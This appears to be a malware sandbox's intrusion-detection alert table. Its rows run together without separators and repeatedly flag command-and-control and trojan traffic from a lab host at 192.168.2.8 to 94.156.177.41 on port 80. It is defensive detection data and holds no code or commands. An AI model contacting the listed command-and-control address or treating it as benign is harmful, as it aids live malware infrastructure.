                      2025-01-11T01:43:17.034256+010020243131Malware Command and Control Activity Detected192.168.2.85124394.156.177.4180TCP
                      2025-01-11T01:43:18.008658+010020243131Malware Command and Control Activity Detected192.168.2.85124494.156.177.4180TCP
                      2025-01-11T01:43:18.899257+010020243131Malware Command and Control Activity Detected192.168.2.85124594.156.177.4180TCP
                      2025-01-11T01:43:19.776146+010020243131Malware Command and Control Activity Detected192.168.2.85124694.156.177.4180TCP
                      2025-01-11T01:43:20.675015+010020243131Malware Command and Control Activity Detected192.168.2.85124794.156.177.4180TCP
                      2025-01-11T01:43:21.529416+010020243131Malware Command and Control Activity Detected192.168.2.85124894.156.177.4180TCP
                      2025-01-11T01:43:22.419117+010020243131Malware Command and Control Activity Detected192.168.2.85124994.156.177.4180TCP
                      2025-01-11T01:43:23.300654+010020243131Malware Command and Control Activity Detected192.168.2.85125094.156.177.4180TCP
                      2025-01-11T01:43:24.173563+010020243131Malware Command and Control Activity Detected192.168.2.85125194.156.177.4180TCP
                      2025-01-11T01:43:25.031983+010020243131Malware Command and Control Activity Detected192.168.2.85125294.156.177.4180TCP
                      2025-01-11T01:43:25.949805+010020243131Malware Command and Control Activity Detected192.168.2.85125394.156.177.4180TCP
                      2025-01-11T01:43:26.814642+010020243131Malware Command and Control Activity Detected192.168.2.85125494.156.177.4180TCP
                      2025-01-11T01:43:27.681023+010020243131Malware Command and Control Activity Detected192.168.2.85125594.156.177.4180TCP
                      2025-01-11T01:43:28.609487+010020243131Malware Command and Control Activity Detected192.168.2.85125694.156.177.4180TCP
                      2025-01-11T01:43:29.581279+010020243131Malware Command and Control Activity Detected192.168.2.85125794.156.177.4180TCP
                      2025-01-11T01:43:30.500137+010020243131Malware Command and Control Activity Detected192.168.2.85125894.156.177.4180TCP
                      2025-01-11T01:43:31.580940+010020243131Malware Command and Control Activity Detected192.168.2.85125994.156.177.4180TCP
                      2025-01-11T01:43:32.450949+010020243131Malware Command and Control Activity Detected192.168.2.85126094.156.177.4180TCP
                      2025-01-11T01:43:33.314839+010020243131Malware Command and Control Activity Detected192.168.2.85126194.156.177.4180TCP
                      2025-01-11T01:43:34.659023+010020243131Malware Command and Control Activity Detected192.168.2.85126294.156.177.4180TCP
                      2025-01-11T01:43:35.532934+010020243131Malware Command and Control Activity Detected192.168.2.85126394.156.177.4180TCP
                      2025-01-11T01:43:36.403855+010020243131Malware Command and Control Activity Detected192.168.2.85126494.156.177.4180TCP
                      2025-01-11T01:43:37.315630+010020243131Malware Command and Control Activity Detected192.168.2.85126694.156.177.4180TCP
                      2025-01-11T01:43:38.226839+010020243131Malware Command and Control Activity Detected192.168.2.85127394.156.177.4180TCP
                      2025-01-11T01:43:39.084674+010020243131Malware Command and Control Activity Detected192.168.2.85128094.156.177.4180TCP
                      2025-01-11T01:43:39.967691+010020243131Malware Command and Control Activity Detected192.168.2.85128994.156.177.4180TCP
                      2025-01-11T01:43:40.906466+010020243131Malware Command and Control Activity Detected192.168.2.85129794.156.177.4180TCP
                      2025-01-11T01:43:41.803250+010020243131Malware Command and Control Activity Detected192.168.2.85130394.156.177.4180TCP
                      2025-01-11T01:43:42.794250+010020243131Malware Command and Control Activity Detected192.168.2.85130994.156.177.4180TCP
                      2025-01-11T01:43:43.674930+010020243131Malware Command and Control Activity Detected192.168.2.85131594.156.177.4180TCP
                      2025-01-11T01:43:44.614068+010020243131Malware Command and Control Activity Detected192.168.2.85132194.156.177.4180TCP
                      2025-01-11T01:43:45.582363+010020243131Malware Command and Control Activity Detected192.168.2.85132794.156.177.4180TCP
                      2025-01-11T01:43:46.438299+010020243131Malware Command and Control Activity Detected192.168.2.85133394.156.177.4180TCP
                      2025-01-11T01:43:47.295907+010020243131Malware Command and Control Activity Detected192.168.2.85133994.156.177.4180TCP
                      2025-01-11T01:43:48.196551+010020243131Malware Command and Control Activity Detected192.168.2.85134694.156.177.4180TCP
                      2025-01-11T01:43:49.076139+010020243131Malware Command and Control Activity Detected192.168.2.85135394.156.177.4180TCP
                      2025-01-11T01:43:49.953109+010020243131Malware Command and Control Activity Detected192.168.2.85136094.156.177.4180TCP
                      2025-01-11T01:43:50.836273+010020243131Malware Command and Control Activity Detected192.168.2.85136894.156.177.4180TCP
                      2025-01-11T01:43:51.718554+010020243131Malware Command and Control Activity Detected192.168.2.85137494.156.177.4180TCP
                      2025-01-11T01:43:52.590087+010020243131Malware Command and Control Activity Detected192.168.2.85138094.156.177.4180TCP
                      2025-01-11T01:43:53.748109+010020243131Malware Command and Control Activity Detected192.168.2.85138894.156.177.4180TCP
                      2025-01-11T01:43:54.614974+010020243131Malware Command and Control Activity Detected192.168.2.85139594.156.177.4180TCP
                      2025-01-11T01:43:55.488808+010020243131Malware Command and Control Activity Detected192.168.2.85140394.156.177.4180TCP
                      2025-01-11T01:43:56.636237+010020243131Malware Command and Control Activity Detected192.168.2.85140694.156.177.4180TCP
                      2025-01-11T01:43:57.548619+010020243131Malware Command and Control Activity Detected192.168.2.85141594.156.177.4180TCP
                      2025-01-11T01:43:58.432809+010020243131Malware Command and Control Activity Detected192.168.2.85142194.156.177.4180TCP
                      2025-01-11T01:43:59.294217+010020243131Malware Command and Control Activity Detected192.168.2.85142794.156.177.4180TCP
                      2025-01-11T01:44:00.168919+010020243131Malware Command and Control Activity Detected192.168.2.85143394.156.177.4180TCP
                      2025-01-11T01:44:01.029999+010020243131Malware Command and Control Activity Detected192.168.2.85143994.156.177.4180TCP
                      2025-01-11T01:44:01.911205+010020243131Malware Command and Control Activity Detected192.168.2.85144694.156.177.4180TCP
                      2025-01-11T01:44:02.788148+010020243131Malware Command and Control Activity Detected192.168.2.85145494.156.177.4180TCP
                      2025-01-11T01:44:03.775125+010020243131Malware Command and Control Activity Detected192.168.2.85145994.156.177.4180TCP
                      2025-01-11T01:44:04.664084+010020243131Malware Command and Control Activity Detected192.168.2.85146894.156.177.4180TCP
                      2025-01-11T01:44:05.575862+010020243131Malware Command and Control Activity Detected192.168.2.85147494.156.177.4180TCP
                      2025-01-11T01:44:06.645085+010020243131Malware Command and Control Activity Detected192.168.2.85148094.156.177.4180TCP
                      2025-01-11T01:44:07.690650+010020243131Malware Command and Control Activity Detected192.168.2.85148694.156.177.4180TCP
                      2025-01-11T01:44:08.542955+010020243131Malware Command and Control Activity Detected192.168.2.85149794.156.177.4180TCP
                      2025-01-11T01:44:09.524805+010020243131Malware Command and Control Activity Detected192.168.2.85150394.156.177.4180TCP
                      2025-01-11T01:44:10.390018+010020243131Malware Command and Control Activity Detected192.168.2.85150994.156.177.4180TCP
                      2025-01-11T01:44:11.267558+010020243131Malware Command and Control Activity Detected192.168.2.85151594.156.177.4180TCP
                      2025-01-11T01:44:12.275424+010020243131Malware Command and Control Activity Detected192.168.2.85152194.156.177.4180TCP
                      2025-01-11T01:44:13.186096+010020243131Malware Command and Control Activity Detected192.168.2.85153194.156.177.4180TCP
                      2025-01-11T01:44:14.053421+010020243131Malware Command and Control Activity Detected192.168.2.85153794.156.177.4180TCP
                      2025-01-11T01:44:14.935173+010020243131Malware Command and Control Activity Detected192.168.2.85154494.156.177.4180TCP
                      2025-01-11T01:44:15.838515+010020243131Malware Command and Control Activity Detected192.168.2.85155094.156.177.4180TCP
                      2025-01-11T01:44:16.721393+010020243131Malware Command and Control Activity Detected192.168.2.85155794.156.177.4180TCP
                      2025-01-11T01:44:17.604119+010020243131Malware Command and Control Activity Detected192.168.2.85156594.156.177.4180TCP
                      2025-01-11T01:44:18.481641+010020243131Malware Command and Control Activity Detected192.168.2.85157194.156.177.4180TCP
                      2025-01-11T01:44:19.611694+010020243131Malware Command and Control Activity Detected192.168.2.85157794.156.177.4180TCP
                      2025-01-11T01:44:20.466096+010020243131Malware Command and Control Activity Detected192.168.2.85158194.156.177.4180TCP
                      2025-01-11T01:44:21.591884+010020243131Malware Command and Control Activity Detected192.168.2.85158294.156.177.4180TCP
                      2025-01-11T01:44:22.440616+010020243131Malware Command and Control Activity Detected192.168.2.85158394.156.177.4180TCP
                      2025-01-11T01:44:23.341846+010020243131Malware Command and Control Activity Detected192.168.2.85158494.156.177.4180TCP
                      2025-01-11T01:44:24.227497+010020243131Malware Command and Control Activity Detected192.168.2.85158594.156.177.4180TCP
                      2025-01-11T01:44:25.071196+010020243131Malware Command and Control Activity Detected192.168.2.85158694.156.177.4180TCP
                      2025-01-11T01:44:25.895893+010020243131Malware Command and Control Activity Detected192.168.2.85158794.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T01:42:23.762234+010020243181Malware Command and Control Activity Detected192.168.2.84970694.156.177.4180TCP
                      2025-01-11T01:42:24.642872+010020243181Malware Command and Control Activity Detected192.168.2.84970794.156.177.4180TCP
                      2025-01-11T01:42:25.938002+010020243181Malware Command and Control Activity Detected192.168.2.84970894.156.177.4180TCP
                      2025-01-11T01:42:26.818252+010020243181Malware Command and Control Activity Detected192.168.2.84970994.156.177.4180TCP
                      2025-01-11T01:42:27.703027+010020243181Malware Command and Control Activity Detected192.168.2.84971094.156.177.4180TCP
                      2025-01-11T01:42:28.855418+010020243181Malware Command and Control Activity Detected192.168.2.84971194.156.177.4180TCP
                      2025-01-11T01:42:29.739177+010020243181Malware Command and Control Activity Detected192.168.2.84971294.156.177.4180TCP
                      2025-01-11T01:42:30.609312+010020243181Malware Command and Control Activity Detected192.168.2.84971394.156.177.4180TCP
                      2025-01-11T01:42:31.824610+010020243181Malware Command and Control Activity Detected192.168.2.84971494.156.177.4180TCP
                      2025-01-11T01:42:32.733349+010020243181Malware Command and Control Activity Detected192.168.2.84971594.156.177.4180TCP
                      2025-01-11T01:42:33.590744+010020243181Malware Command and Control Activity Detected192.168.2.84971694.156.177.4180TCP
                      2025-01-11T01:42:34.808586+010020243181Malware Command and Control Activity Detected192.168.2.84971794.156.177.4180TCP
                      2025-01-11T01:42:35.673992+010020243181Malware Command and Control Activity Detected192.168.2.84971894.156.177.4180TCP
                      2025-01-11T01:42:36.597333+010020243181Malware Command and Control Activity Detected192.168.2.84972094.156.177.4180TCP
                      2025-01-11T01:42:37.453451+010020243181Malware Command and Control Activity Detected192.168.2.84972294.156.177.4180TCP
                      2025-01-11T01:42:38.373443+010020243181Malware Command and Control Activity Detected192.168.2.84972394.156.177.4180TCP
                      2025-01-11T01:42:39.300522+010020243181Malware Command and Control Activity Detected192.168.2.84972494.156.177.4180TCP
                      2025-01-11T01:42:40.182347+010020243181Malware Command and Control Activity Detected192.168.2.84972594.156.177.4180TCP
                      2025-01-11T01:42:41.051405+010020243181Malware Command and Control Activity Detected192.168.2.84972694.156.177.4180TCP
                      2025-01-11T01:42:41.904144+010020243181Malware Command and Control Activity Detected192.168.2.84972794.156.177.4180TCP
                      2025-01-11T01:42:42.789215+010020243181Malware Command and Control Activity Detected192.168.2.84972894.156.177.4180TCP
                      2025-01-11T01:42:43.880204+010020243181Malware Command and Control Activity Detected192.168.2.84972994.156.177.4180TCP
                      2025-01-11T01:42:44.715443+010020243181Malware Command and Control Activity Detected192.168.2.84973094.156.177.4180TCP
                      2025-01-11T01:42:45.597583+010020243181Malware Command and Control Activity Detected192.168.2.84973194.156.177.4180TCP
                      2025-01-11T01:42:46.616967+010020243181Malware Command and Control Activity Detected192.168.2.84973294.156.177.4180TCP
                      2025-01-11T01:42:47.494263+010020243181Malware Command and Control Activity Detected192.168.2.84973394.156.177.4180TCP
                      2025-01-11T01:42:48.388017+010020243181Malware Command and Control Activity Detected192.168.2.84973494.156.177.4180TCP
                      2025-01-11T01:42:49.285558+010020243181Malware Command and Control Activity Detected192.168.2.84973594.156.177.4180TCP
                      2025-01-11T01:42:50.165740+010020243181Malware Command and Control Activity Detected192.168.2.84973694.156.177.4180TCP
                      2025-01-11T01:42:51.033454+010020243181Malware Command and Control Activity Detected192.168.2.84973794.156.177.4180TCP
                      2025-01-11T01:42:51.929916+010020243181Malware Command and Control Activity Detected192.168.2.84973894.156.177.4180TCP
                      2025-01-11T01:42:53.011005+010020243181Malware Command and Control Activity Detected192.168.2.84973994.156.177.4180TCP
                      2025-01-11T01:42:54.019699+010020243181Malware Command and Control Activity Detected192.168.2.84974094.156.177.4180TCP
                      2025-01-11T01:42:54.883072+010020243181Malware Command and Control Activity Detected192.168.2.84974194.156.177.4180TCP
                      2025-01-11T01:42:55.733113+010020243181Malware Command and Control Activity Detected192.168.2.84974294.156.177.4180TCP
                      2025-01-11T01:42:56.756990+010020243181Malware Command and Control Activity Detected192.168.2.84974394.156.177.4180TCP
                      2025-01-11T01:42:57.657232+010020243181Malware Command and Control Activity Detected192.168.2.84974494.156.177.4180TCP
                      2025-01-11T01:42:58.531476+010020243181Malware Command and Control Activity Detected192.168.2.84974594.156.177.4180TCP
                      2025-01-11T01:42:59.839528+010020243181Malware Command and Control Activity Detected192.168.2.84974694.156.177.4180TCP
                      2025-01-11T01:43:00.718117+010020243181Malware Command and Control Activity Detected192.168.2.84974794.156.177.4180TCP
                      2025-01-11T01:43:01.574531+010020243181Malware Command and Control Activity Detected192.168.2.84974894.156.177.4180TCP
                      2025-01-11T01:43:02.677370+010020243181Malware Command and Control Activity Detected192.168.2.84974994.156.177.4180TCP
                      2025-01-11T01:43:03.548607+010020243181Malware Command and Control Activity Detected192.168.2.84975094.156.177.4180TCP
                      2025-01-11T01:43:04.445387+010020243181Malware Command and Control Activity Detected192.168.2.85123094.156.177.4180TCP
                      2025-01-11T01:43:05.582800+010020243181Malware Command and Control Activity Detected192.168.2.85123194.156.177.4180TCP
                      2025-01-11T01:43:06.451735+010020243181Malware Command and Control Activity Detected192.168.2.85123294.156.177.4180TCP
                      2025-01-11T01:43:07.362946+010020243181Malware Command and Control Activity Detected192.168.2.85123394.156.177.4180TCP
                      2025-01-11T01:43:08.501687+010020243181Malware Command and Control Activity Detected192.168.2.85123494.156.177.4180TCP
                      2025-01-11T01:43:09.359941+010020243181Malware Command and Control Activity Detected192.168.2.85123594.156.177.4180TCP
                      2025-01-11T01:43:10.258088+010020243181Malware Command and Control Activity Detected192.168.2.85123694.156.177.4180TCP
                      2025-01-11T01:43:11.447670+010020243181Malware Command and Control Activity Detected192.168.2.85123794.156.177.4180TCP
                      2025-01-11T01:43:12.357348+010020243181Malware Command and Control Activity Detected192.168.2.85123894.156.177.4180TCP
                      2025-01-11T01:43:13.250209+010020243181Malware Command and Control Activity Detected192.168.2.85123994.156.177.4180TCP
                      2025-01-11T01:43:14.455819+010020243181Malware Command and Control Activity Detected192.168.2.85124094.156.177.4180TCP
                      2025-01-11T01:43:15.317903+010020243181Malware Command and Control Activity Detected192.168.2.85124194.156.177.4180TCP
                      2025-01-11T01:43:16.169920+010020243181Malware Command and Control Activity Detected192.168.2.85124294.156.177.4180TCP
                      2025-01-11T01:43:17.034256+010020243181Malware Command and Control Activity Detected192.168.2.85124394.156.177.4180TCP
                      2025-01-11T01:43:18.008658+010020243181Malware Command and Control Activity Detected192.168.2.85124494.156.177.4180TCP
                      2025-01-11T01:43:18.899257+010020243181Malware Command and Control Activity Detected192.168.2.85124594.156.177.4180TCP
                      2025-01-11T01:43:19.776146+010020243181Malware Command and Control Activity Detected192.168.2.85124694.156.177.4180TCP
                      2025-01-11T01:43:20.675015+010020243181Malware Command and Control Activity Detected192.168.2.85124794.156.177.4180TCP
                      2025-01-11T01:43:21.529416+010020243181Malware Command and Control Activity Detected192.168.2.85124894.156.177.4180TCP
                      2025-01-11T01:43:22.419117+010020243181Malware Command and Control Activity Detected192.168.2.85124994.156.177.4180TCP
                      2025-01-11T01:43:23.300654+010020243181Malware Command and Control Activity Detected192.168.2.85125094.156.177.4180TCP
                      2025-01-11T01:43:24.173563+010020243181Malware Command and Control Activity Detected192.168.2.85125194.156.177.4180TCP
                      2025-01-11T01:43:25.031983+010020243181Malware Command and Control Activity Detected192.168.2.85125294.156.177.4180TCP
                      2025-01-11T01:43:25.949805+010020243181Malware Command and Control Activity Detected192.168.2.85125394.156.177.4180TCP
                      2025-01-11T01:43:26.814642+010020243181Malware Command and Control Activity Detected192.168.2.85125494.156.177.4180TCP
                      2025-01-11T01:43:27.681023+010020243181Malware Command and Control Activity Detected192.168.2.85125594.156.177.4180TCP
                      2025-01-11T01:43:28.609487+010020243181Malware Command and Control Activity Detected192.168.2.85125694.156.177.4180TCP
                      2025-01-11T01:43:29.581279+010020243181Malware Command and Control Activity Detected192.168.2.85125794.156.177.4180TCP
                      2025-01-11T01:43:30.500137+010020243181Malware Command and Control Activity Detected192.168.2.85125894.156.177.4180TCP
                      2025-01-11T01:43:31.580940+010020243181Malware Command and Control Activity Detected192.168.2.85125994.156.177.4180TCP
                      2025-01-11T01:43:32.450949+010020243181Malware Command and Control Activity Detected192.168.2.85126094.156.177.4180TCP
                      2025-01-11T01:43:33.314839+010020243181Malware Command and Control Activity Detected192.168.2.85126194.156.177.4180TCP
                      2025-01-11T01:43:34.659023+010020243181Malware Command and Control Activity Detected192.168.2.85126294.156.177.4180TCP
                      2025-01-11T01:43:35.532934+010020243181Malware Command and Control Activity Detected192.168.2.85126394.156.177.4180TCP
                      2025-01-11T01:43:36.403855+010020243181Malware Command and Control Activity Detected192.168.2.85126494.156.177.4180TCP
                      2025-01-11T01:43:37.315630+010020243181Malware Command and Control Activity Detected192.168.2.85126694.156.177.4180TCP
                      2025-01-11T01:43:38.226839+010020243181Malware Command and Control Activity Detected192.168.2.85127394.156.177.4180TCP
                      2025-01-11T01:43:39.084674+010020243181Malware Command and Control Activity Detected192.168.2.85128094.156.177.4180TCP
                      2025-01-11T01:43:39.967691+010020243181Malware Command and Control Activity Detected192.168.2.85128994.156.177.4180TCP
                      2025-01-11T01:43:40.906466+010020243181Malware Command and Control Activity Detected192.168.2.85129794.156.177.4180TCP
                      2025-01-11T01:43:41.803250+010020243181Malware Command and Control Activity Detected192.168.2.85130394.156.177.4180TCP
                      2025-01-11T01:43:42.794250+010020243181Malware Command and Control Activity Detected192.168.2.85130994.156.177.4180TCP
                      2025-01-11T01:43:43.674930+010020243181Malware Command and Control Activity Detected192.168.2.85131594.156.177.4180TCP
                      2025-01-11T01:43:44.614068+010020243181Malware Command and Control Activity Detected192.168.2.85132194.156.177.4180TCP
                      2025-01-11T01:43:45.582363+010020243181Malware Command and Control Activity Detected192.168.2.85132794.156.177.4180TCP
                      2025-01-11T01:43:46.438299+010020243181Malware Command and Control Activity Detected192.168.2.85133394.156.177.4180TCP
                      2025-01-11T01:43:47.295907+010020243181Malware Command and Control Activity Detected192.168.2.85133994.156.177.4180TCP
                      2025-01-11T01:43:48.196551+010020243181Malware Command and Control Activity Detected192.168.2.85134694.156.177.4180TCP
                      2025-01-11T01:43:49.076139+010020243181Malware Command and Control Activity Detected192.168.2.85135394.156.177.4180TCP
                      2025-01-11T01:43:49.953109+010020243181Malware Command and Control Activity Detected192.168.2.85136094.156.177.4180TCP
                      2025-01-11T01:43:50.836273+010020243181Malware Command and Control Activity Detected192.168.2.85136894.156.177.4180TCP
                      2025-01-11T01:43:51.718554+010020243181Malware Command and Control Activity Detected192.168.2.85137494.156.177.4180TCP
                      2025-01-11T01:43:52.590087+010020243181Malware Command and Control Activity Detected192.168.2.85138094.156.177.4180TCP
                      2025-01-11T01:43:53.748109+010020243181Malware Command and Control Activity Detected192.168.2.85138894.156.177.4180TCP
                      2025-01-11T01:43:54.614974+010020243181Malware Command and Control Activity Detected192.168.2.85139594.156.177.4180TCP
                      2025-01-11T01:43:55.488808+010020243181Malware Command and Control Activity Detected192.168.2.85140394.156.177.4180TCP
                      2025-01-11T01:43:56.636237+010020243181Malware Command and Control Activity Detected192.168.2.85140694.156.177.4180TCP
                      2025-01-11T01:43:57.548619+010020243181Malware Command and Control Activity Detected192.168.2.85141594.156.177.4180TCP
                      2025-01-11T01:43:58.432809+010020243181Malware Command and Control Activity Detected192.168.2.85142194.156.177.4180TCP
                      2025-01-11T01:43:59.294217+010020243181Malware Command and Control Activity Detected192.168.2.85142794.156.177.4180TCP
                      2025-01-11T01:44:00.168919+010020243181Malware Command and Control Activity Detected192.168.2.85143394.156.177.4180TCP
                      2025-01-11T01:44:01.029999+010020243181Malware Command and Control Activity Detected192.168.2.85143994.156.177.4180TCP
                      2025-01-11T01:44:01.911205+010020243181Malware Command and Control Activity Detected192.168.2.85144694.156.177.4180TCP
                      2025-01-11T01:44:02.788148+010020243181Malware Command and Control Activity Detected192.168.2.85145494.156.177.4180TCP
                      2025-01-11T01:44:03.775125+010020243181Malware Command and Control Activity Detected192.168.2.85145994.156.177.4180TCP
                      2025-01-11T01:44:04.664084+010020243181Malware Command and Control Activity Detected192.168.2.85146894.156.177.4180TCP
                      2025-01-11T01:44:05.575862+010020243181Malware Command and Control Activity Detected192.168.2.85147494.156.177.4180TCP
                      2025-01-11T01:44:06.645085+010020243181Malware Command and Control Activity Detected192.168.2.85148094.156.177.4180TCP
                      2025-01-11T01:44:07.690650+010020243181Malware Command and Control Activity Detected192.168.2.85148694.156.177.4180TCP
                      2025-01-11T01:44:08.542955+010020243181Malware Command and Control Activity Detected192.168.2.85149794.156.177.4180TCP
                      2025-01-11T01:44:09.524805+010020243181Malware Command and Control Activity Detected192.168.2.85150394.156.177.4180TCP
                      2025-01-11T01:44:10.390018+010020243181Malware Command and Control Activity Detected192.168.2.85150994.156.177.4180TCP
                      2025-01-11T01:44:11.267558+010020243181Malware Command and Control Activity Detected192.168.2.85151594.156.177.4180TCP
                      2025-01-11T01:44:12.275424+010020243181Malware Command and Control Activity Detected192.168.2.85152194.156.177.4180TCP
                      2025-01-11T01:44:13.186096+010020243181Malware Command and Control Activity Detected192.168.2.85153194.156.177.4180TCP
                      2025-01-11T01:44:14.053421+010020243181Malware Command and Control Activity Detected192.168.2.85153794.156.177.4180TCP
                      2025-01-11T01:44:14.935173+010020243181Malware Command and Control Activity Detected192.168.2.85154494.156.177.4180TCP
                      2025-01-11T01:44:15.838515+010020243181Malware Command and Control Activity Detected192.168.2.85155094.156.177.4180TCP
                      2025-01-11T01:44:16.721393+010020243181Malware Command and Control Activity Detected192.168.2.85155794.156.177.4180TCP
                      2025-01-11T01:44:17.604119+010020243181Malware Command and Control Activity Detected192.168.2.85156594.156.177.4180TCP
                      2025-01-11T01:44:18.481641+010020243181Malware Command and Control Activity Detected192.168.2.85157194.156.177.4180TCP
                      2025-01-11T01:44:19.611694+010020243181Malware Command and Control Activity Detected192.168.2.85157794.156.177.4180TCP
                      2025-01-11T01:44:20.466096+010020243181Malware Command and Control Activity Detected192.168.2.85158194.156.177.4180TCP
                      2025-01-11T01:44:21.591884+010020243181Malware Command and Control Activity Detected192.168.2.85158294.156.177.4180TCP
                      2025-01-11T01:44:22.440616+010020243181Malware Command and Control Activity Detected192.168.2.85158394.156.177.4180TCP
                      2025-01-11T01:44:23.341846+010020243181Malware Command and Control Activity Detected192.168.2.85158494.156.177.4180TCP
                      2025-01-11T01:44:24.227497+010020243181Malware Command and Control Activity Detected192.168.2.85158594.156.177.4180TCP
                      2025-01-11T01:44:25.071196+010020243181Malware Command and Control Activity Detected192.168.2.85158694.156.177.4180TCP
                      2025-01-11T01:44:25.895893+010020243181Malware Command and Control Activity Detected192.168.2.85158794.156.177.4180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-11T01:42:20.817288+010020216411A Network Trojan was detected192.168.2.84970494.156.177.4180TCP
                      2025-01-11T01:42:22.238848+010020216411A Network Trojan was detected192.168.2.84970594.156.177.4180TCP
                      2025-01-11T01:42:23.040247+010020216411A Network Trojan was detected192.168.2.84970694.156.177.4180TCP
                      2025-01-11T01:42:23.920673+010020216411A Network Trojan was detected192.168.2.84970794.156.177.4180TCP
                      2025-01-11T01:42:25.197136+010020216411A Network Trojan was detected192.168.2.84970894.156.177.4180TCP
                      2025-01-11T01:42:26.102355+010020216411A Network Trojan was detected192.168.2.84970994.156.177.4180TCP
                      2025-01-11T01:42:26.968789+010020216411A Network Trojan was detected192.168.2.84971094.156.177.4180TCP
                      2025-01-11T01:42:28.135810+010020216411A Network Trojan was detected192.168.2.84971194.156.177.4180TCP
                      2025-01-11T01:42:29.019551+010020216411A Network Trojan was detected192.168.2.84971294.156.177.4180TCP
                      2025-01-11T01:42:29.891718+010020216411A Network Trojan was detected192.168.2.84971394.156.177.4180TCP
                      2025-01-11T01:42:31.084444+010020216411A Network Trojan was detected192.168.2.84971494.156.177.4180TCP
                      2025-01-11T01:42:31.992422+010020216411A Network Trojan was detected192.168.2.84971594.156.177.4180TCP
                      2025-01-11T01:42:32.889368+010020216411A Network Trojan was detected192.168.2.84971694.156.177.4180TCP
                      2025-01-11T01:42:34.065163+010020216411A Network Trojan was detected192.168.2.84971794.156.177.4180TCP
                      2025-01-11T01:42:34.969892+010020216411A Network Trojan was detected192.168.2.84971894.156.177.4180TCP
                      2025-01-11T01:42:35.848202+010020216411A Network Trojan was detected192.168.2.84972094.156.177.4180TCP
                      2025-01-11T01:42:36.756536+010020216411A Network Trojan was detected192.168.2.84972294.156.177.4180TCP
                      2025-01-11T01:42:37.616845+010020216411A Network Trojan was detected192.168.2.84972394.156.177.4180TCP
                      2025-01-11T01:42:38.534914+010020216411A Network Trojan was detected192.168.2.84972494.156.177.4180TCP
                      2025-01-11T01:42:39.453290+010020216411A Network Trojan was detected192.168.2.84972594.156.177.4180TCP
                      2025-01-11T01:42:40.352448+010020216411A Network Trojan was detected192.168.2.84972694.156.177.4180TCP
                      2025-01-11T01:42:41.207139+010020216411A Network Trojan was detected192.168.2.84972794.156.177.4180TCP
                      2025-01-11T01:42:42.069381+010020216411A Network Trojan was detected192.168.2.84972894.156.177.4180TCP
                      2025-01-11T01:42:42.979513+010020216411A Network Trojan was detected192.168.2.84972994.156.177.4180TCP
                      2025-01-11T01:42:44.030365+010020216411A Network Trojan was detected192.168.2.84973094.156.177.4180TCP
                      2025-01-11T01:42:44.878656+010020216411A Network Trojan was detected192.168.2.84973194.156.177.4180TCP
                      2025-01-11T01:42:45.910982+010020216411A Network Trojan was detected192.168.2.84973294.156.177.4180TCP
                      2025-01-11T01:42:46.766963+010020216411A Network Trojan was detected192.168.2.84973394.156.177.4180TCP
                      2025-01-11T01:42:47.676875+010020216411A Network Trojan was detected192.168.2.84973494.156.177.4180TCP
                      2025-01-11T01:42:48.545843+010020216411A Network Trojan was detected192.168.2.84973594.156.177.4180TCP
                      2025-01-11T01:42:49.438319+010020216411A Network Trojan was detected192.168.2.84973694.156.177.4180TCP
                      2025-01-11T01:42:50.341121+010020216411A Network Trojan was detected192.168.2.84973794.156.177.4180TCP
                      2025-01-11T01:42:51.209451+010020216411A Network Trojan was detected192.168.2.84973894.156.177.4180TCP
                      2025-01-11T01:42:52.288988+010020216411A Network Trojan was detected192.168.2.84973994.156.177.4180TCP
                      2025-01-11T01:42:53.175499+010020216411A Network Trojan was detected192.168.2.84974094.156.177.4180TCP
                      2025-01-11T01:42:54.184422+010020216411A Network Trojan was detected192.168.2.84974194.156.177.4180TCP
                      2025-01-11T01:42:55.035617+010020216411A Network Trojan was detected192.168.2.84974294.156.177.4180TCP
                      2025-01-11T01:42:55.992626+010020216411A Network Trojan was detected192.168.2.84974394.156.177.4180TCP
                      2025-01-11T01:42:56.917464+010020216411A Network Trojan was detected192.168.2.84974494.156.177.4180TCP
                      2025-01-11T01:42:57.813692+010020216411A Network Trojan was detected192.168.2.84974594.156.177.4180TCP
                      2025-01-11T01:42:58.986101+010020216411A Network Trojan was detected192.168.2.84974694.156.177.4180TCP
                      2025-01-11T01:43:00.003340+010020216411A Network Trojan was detected192.168.2.84974794.156.177.4180TCP
                      2025-01-11T01:43:00.875736+010020216411A Network Trojan was detected192.168.2.84974894.156.177.4180TCP
                      2025-01-11T01:43:01.944954+010020216411A Network Trojan was detected192.168.2.84974994.156.177.4180TCP
                      2025-01-11T01:43:02.826098+010020216411A Network Trojan was detected192.168.2.84975094.156.177.4180TCP
                      2025-01-11T01:43:03.707674+010020216411A Network Trojan was detected192.168.2.85123094.156.177.4180TCP
                      2025-01-11T01:43:04.854034+010020216411A Network Trojan was detected192.168.2.85123194.156.177.4180TCP
                      2025-01-11T01:43:05.736299+010020216411A Network Trojan was detected192.168.2.85123294.156.177.4180TCP
                      2025-01-11T01:43:06.614277+010020216411A Network Trojan was detected192.168.2.85123394.156.177.4180TCP
                      2025-01-11T01:43:07.773450+010020216411A Network Trojan was detected192.168.2.85123494.156.177.4180TCP
                      2025-01-11T01:43:08.660221+010020216411A Network Trojan was detected192.168.2.85123594.156.177.4180TCP
                      2025-01-11T01:43:09.514398+010020216411A Network Trojan was detected192.168.2.85123694.156.177.4180TCP
                      2025-01-11T01:43:10.707200+010020216411A Network Trojan was detected192.168.2.85123794.156.177.4180TCP
                      2025-01-11T01:43:11.607612+010020216411A Network Trojan was detected192.168.2.85123894.156.177.4180TCP
                      2025-01-11T01:43:12.528797+010020216411A Network Trojan was detected192.168.2.85123994.156.177.4180TCP
                      2025-01-11T01:43:13.572275+010020216411A Network Trojan was detected192.168.2.85124094.156.177.4180TCP
                      2025-01-11T01:43:14.611221+010020216411A Network Trojan was detected192.168.2.85124194.156.177.4180TCP
                      2025-01-11T01:43:15.469661+010020216411A Network Trojan was detected192.168.2.85124294.156.177.4180TCP
                      2025-01-11T01:43:16.338867+010020216411A Network Trojan was detected192.168.2.85124394.156.177.4180TCP
                      2025-01-11T01:43:17.186517+010020216411A Network Trojan was detected192.168.2.85124494.156.177.4180TCP
                      2025-01-11T01:43:18.171449+010020216411A Network Trojan was detected192.168.2.85124594.156.177.4180TCP
                      2025-01-11T01:43:19.049624+010020216411A Network Trojan was detected192.168.2.85124694.156.177.4180TCP
